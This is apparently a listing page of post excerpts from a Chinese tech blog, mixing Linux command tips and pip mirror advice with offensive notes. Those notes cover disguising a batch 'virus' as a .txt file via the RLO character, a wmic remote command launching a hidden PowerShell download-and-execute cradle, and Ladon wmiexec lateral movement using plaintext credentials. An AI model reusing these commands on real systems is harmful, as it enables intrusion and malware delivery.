返回顶部
上一页 1 2 3 4 5 6 7 8 ··· 27 下一页
摘要: 阅读全文
posted @ 2021-10-21 11:43 御用闲人 阅读(266) 评论(0) 推荐(0) 编辑
摘要: 使用Win10 linux子系统的过程中发现一个问题:如果主/子系统同时设置环境变量,那么子系统会优先选择主系统的环境变量。 1.打开"注册表" win + r 打开"运行",输入regedit , 2.找到HKEY_CURRENT_USER\Software\Microsoft\Windows\C 阅读全文
posted @ 2021-09-28 17:16 御用闲人 阅读(180) 评论(0) 推荐(0) 编辑
摘要: 有时候安装一些依赖包,网不好,直接超时,或者这个包就是死都下不下来的时候,可以指定国内源镜像。 pip install -i 国内镜像地址 包名 e.g. pip install -i http://mirrors.aliyun.com/pypi/simple/ numpy 这是临时指定镜像地址 清 阅读全文
posted @ 2021-09-22 09:06 御用闲人 阅读(453) 评论(0) 推荐(0) 编辑
摘要: #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #include <Windows.h> #include <stdio.h> #pragma comment( linker, "/subsy 阅读全文
posted @ 2021-09-18 15:57 御用闲人 阅读(790) 评论(0) 推荐(0) 编辑
摘要: Linux grep 命令用于查找文件里符合条件的字符串。 grep 指令用于查找内容包含指定的范本样式的文件,如果发现某文件的内容符合所指定的范本样式,预设 grep 指令会把含有范本样式的那一列显示出来。若不指定任何文件名称,或是所给予的文件名为 -,则 grep 指令会从标准输入设备读取数据。 阅读全文
posted @ 2021-09-14 17:45 御用闲人 阅读(53) 评论(0) 推荐(0) 编辑
摘要: Linux wc命令用于计算字数。 利用wc指令我们可以计算文件的Byte数、字数、或是列数,若不指定文件名称、或是所给予的文件名为"-",则wc指令会从标准输入设备读取数据。 语法: wc [-clw][--help][--version][文件...] 参数: -c或--bytes或--char 阅读全文
posted @ 2021-09-14 17:33 御用闲人 阅读(75) 评论(0) 推荐(0) 编辑
摘要: Linux uniq 命令用于检查及删除文本文件中重复出现的行列,一般与 sort 命令结合使用。 uniq 可检查文本文件中重复出现的行列。 语法: uniq [-cdu][-f<栏位>][-s<字符位置>][-w<字符位置>][--help][--version][输入文件][输出文件] 参数: 阅读全文
posted @ 2021-09-14 17:25 御用闲人 阅读(92) 评论(0) 推荐(0) 编辑
摘要: Linux sort 命令用于将文本文件内容加以排序。 sort 可针对文本文件的内容,以行为单位来排序。 语法: sort [-bcdfimMnr][-o<输出文件>][-t<分隔字符>][+<起始栏位>-<结束栏位>][--help][--verison][文件][-k field1[,fiel 阅读全文
posted @ 2021-09-14 17:20 御用闲人 阅读(76) 评论(0) 推荐(0) 编辑
摘要: 1.制作一个文件; 2.将这个文件命名为txt.bat; 3.继续重命名,把光标移动到文件名中txt的前面,右击-插入Unicode控制字符-RLO,插入后回车; 4.这时你就会发现这个病毒的后缀名变成了txt; 实例: 重命名后: 把图标修改后,机具迷惑性; 阅读全文
posted @ 2021-09-10 10:09 御用闲人 阅读(354) 评论(0) 推荐(0) 编辑
摘要: 注意:Sysmon是微软对于Eventlog的补充解决⽅案,这是笔者对于Sysmon的理解,Sysmon可以能够获取到 Evenlog获取不到的更多信息; sysmon64.exe -i exampleSysmonConfig.xml //执⾏安装: sysmon64.exe -u //删除 执⾏安 阅读全文
posted @ 2021-09-07 16:57 御用闲人 阅读(280) 评论(0) 推荐(0) 编辑
摘要: wmic /NODE:192.168.8.180 /user:"administrator" /password:"win@123" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webcli 阅读全文
posted @ 2021-09-07 15:57 御用闲人 阅读(152) 评论(0) 推荐(0) 编辑
摘要: Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share #共享 Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile #⽂件/⽬录列表 Get-WmiObject -Namespace R 阅读全文
posted @ 2021-09-07 15:54 御用闲人 阅读(319) 评论(0) 推荐(0) 编辑
摘要: 注意:wmic命令需要本地管理员或域管理员才可以进⾏正常使⽤,普通权限⽤户若想要使⽤wmi,可以修改 普通⽤户的ACL,不过修改⽤户的ACL也需要管理员权限,这⾥笔者单独罗列⼩结:普通⽤户使⽤wmic。以下 命令均在2008R2、2012R2、2016上进⾏测试,部分命令在虚拟机中测试不⾏,例如查询 阅读全文
posted @ 2021-09-07 15:52 御用闲人 阅读(410) 评论(0) 推荐(0) 编辑
摘要: ###在⼯作组尝试执⾏命令 ladon.exe wmiexec2 192.168.8.192 Administrator win@123 cmd whoami ###在域内尝试执⾏命令 ladon.exe wmiexec2 10.10.0.10 test1\Administrator win@123 阅读全文
posted @ 2021-09-07 15:45 御用闲人 阅读(57) 评论(0) 推荐(0) 编辑
摘要: ladon.exe wmiexec 192.168.8.192 Administrator win@123 cmd whoami 阅读全文
posted @ 2021-09-07 15:43 御用闲人 阅读(200) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 27 下一页